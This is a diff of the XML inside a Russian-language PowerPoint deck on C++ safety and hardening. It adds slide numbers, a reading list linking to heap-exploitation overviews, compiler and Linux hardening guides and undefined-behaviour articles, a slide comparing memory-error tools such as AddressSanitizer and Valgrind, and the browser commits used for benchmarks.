+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>85</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -27757,6 +29826,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD9F63E-EF6A-418A-B986-AFC03C54C97A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>86</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -27841,9 +29939,144 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO</a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Примеры атак</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Nightmare</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Overview of GLIBC heap exploitation techniques</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Руководства по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>OpenSSF</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t> Compiler Options Hardening Guide for C and C++</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>Linux Hardening Guide</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Статьи </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>John </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Regehr</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>про </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>UB</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>A Guide to Undefined Behavior in C and C++</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId7"/>
+              </a:rPr>
+              <a:t>UB in 2017</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F156ECC1-89ED-435D-9383-51CEED6C2D15}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>87</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -27997,6 +30230,35 @@
           </a:prstGeom>
         </p:spPr>
       </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A51005D-9E17-47C5-BDBD-99FFE4265CB4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>88</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -28081,6 +30343,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2943A-E379-4742-8C1A-0BAC9F109FE2}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>89</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -28167,225 +30458,203 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>AddressSanitizer</a:t>
             </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack/heap/static overflow, double free, use-after-free/return, etc.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>State-of-the-art</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Может ограниченно использоваться в проде для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>A/B </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>тестирования</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Особенно варианты с низкими накладными расходами </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(GWP-Asan, HWASan)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Отладочные проверки </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>STL</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack/heap/static overflow, double free, use-after-free/return, etc.</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Например </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_GLIBCXX_DEBUG</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>libstdc++ </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>_</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>LIBCPP_ABI_BOUNDED_ITERATORS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>libc++</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>State-of-the-art</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Меняют </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ABI =&gt; </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>требуется полная пересборка зависимостей</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Valgrind</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Может ограниченно использоваться в проде для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>A/B </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>тестирования</a:t>
+              <a:t>Только ошибки кучи</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: heap overflow, double free, use-after-free, etc.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Намного медленнее </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Asan,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> но может найти доп. ошибки</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Особенно варианты с низкими накладными расходами </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(GWP-Asan, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>HWASan</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Другие инструменты</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ElectricFence (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>только </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>heap overflow</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>)</a:t>
             </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Отладочные проверки </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Например </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-D_GLIBCXX_DEBUG</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>libstdc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>++ </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>или </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-D</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>_</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>LIBCPP_ABI_BOUNDED_ITERATORS</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>libc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>++</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Меняют </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>ABI =&gt; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>требуется полная пересборка зависимостей</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Valgrind</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Только ошибки кучи</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: heap overflow, double free, use-after-free, etc.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Намного медленнее </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Asan,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> но может найти доп. ошибки</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Другие инструменты</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ElectricFence</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>только </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>heap overflow</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>, </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
+              <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
               <a:t>DirtyFrame</a:t>
@@ -28394,6 +30663,35 @@
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>, etc.</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{661D04F8-09C8-4303-A86A-CD9BCCECAA92}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>9</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -28475,7 +30773,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -28492,7 +30790,15 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверялись последние стабильные версии</a:t>
+              <a:t>Проверялись последние </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0"/>
+              <a:t>стабильные</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> версии</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -28506,6 +30812,79 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Версии браузеров</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://github.com/mozilla-firefox/firefox</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>коммит </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>b0ca903b</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>https://chromium.googlesource.com/chromium/src</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>коммит </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>d0273f3d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Замеры производительности </a:t>
             </a:r>
             <a:r>
@@ -28517,7 +30896,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
+                <a:hlinkClick r:id="rId4"/>
               </a:rPr>
               <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/bench</a:t>
             </a:r>
@@ -28545,7 +30924,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
+                <a:hlinkClick r:id="rId5"/>
               </a:rPr>
               <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/scripts</a:t>
             </a:r>
@@ -28562,7 +30941,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
+                <a:hlinkClick r:id="rId6"/>
               </a:rPr>
               <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/plan.md</a:t>
             </a:r>
@@ -28570,6 +30949,35 @@
               <a:rPr lang="en-US" dirty="0"/>
               <a:t> </a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD3E67F-01FC-47C1-BE9B-97F0109DAF0E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>90</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -28879,4 +31287,299 @@
     </a:ext>
   </a:extLst>
 </a:theme>
+</file>
+
+<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
+  <a:themeElements>
+    <a:clrScheme name="Office">
+      <a:dk1>
+        <a:sysClr val="windowText" lastClr="000000"/>
+      </a:dk1>
+      <a:lt1>
+        <a:sysClr val="window" lastClr="FFFFFF"/>
+      </a:lt1>
+      <a:dk2>
+        <a:srgbClr val="44546A"/>
+      </a:dk2>
+      <a:lt2>
+        <a:srgbClr val="E7E6E6"/>
+      </a:lt2>
+      <a:accent1>
+        <a:srgbClr val="4472C4"/>
+      </a:accent1>
+      <a:accent2>
+        <a:srgbClr val="ED7D31"/>
+      </a:accent2>
+      <a:accent3>
+        <a:srgbClr val="A5A5A5"/>
+      </a:accent3>
+      <a:accent4>
+        <a:srgbClr val="FFC000"/>
+      </a:accent4>
+      <a:accent5>
+        <a:srgbClr val="5B9BD5"/>
+      </a:accent5>
+      <a:accent6>
+        <a:srgbClr val="70AD47"/>
+      </a:accent6>
+      <a:hlink>
+        <a:srgbClr val="0563C1"/>
+      </a:hlink>
+      <a:folHlink>
+        <a:srgbClr val="954F72"/>
+      </a:folHlink>
+    </a:clrScheme>
+    <a:fontScheme name="Office">
+      <a:majorFont>
+        <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
+        <a:ea typeface=""/>
+        <a:cs typeface=""/>
+        <a:font script="Jpan" typeface="游ゴシック Light"/>
+        <a:font script="Hang" typeface="맑은 고딕"/>
+        <a:font script="Hans" typeface="等线 Light"/>
+        <a:font script="Hant" typeface="新細明體"/>
+        <a:font script="Arab" typeface="Times New Roman"/>
+        <a:font script="Hebr" typeface="Times New Roman"/>
+        <a:font script="Thai" typeface="Angsana New"/>
+        <a:font script="Ethi" typeface="Nyala"/>
+        <a:font script="Beng" typeface="Vrinda"/>
+        <a:font script="Gujr" typeface="Shruti"/>
+        <a:font script="Khmr" typeface="MoolBoran"/>
+        <a:font script="Knda" typeface="Tunga"/>
+        <a:font script="Guru" typeface="Raavi"/>
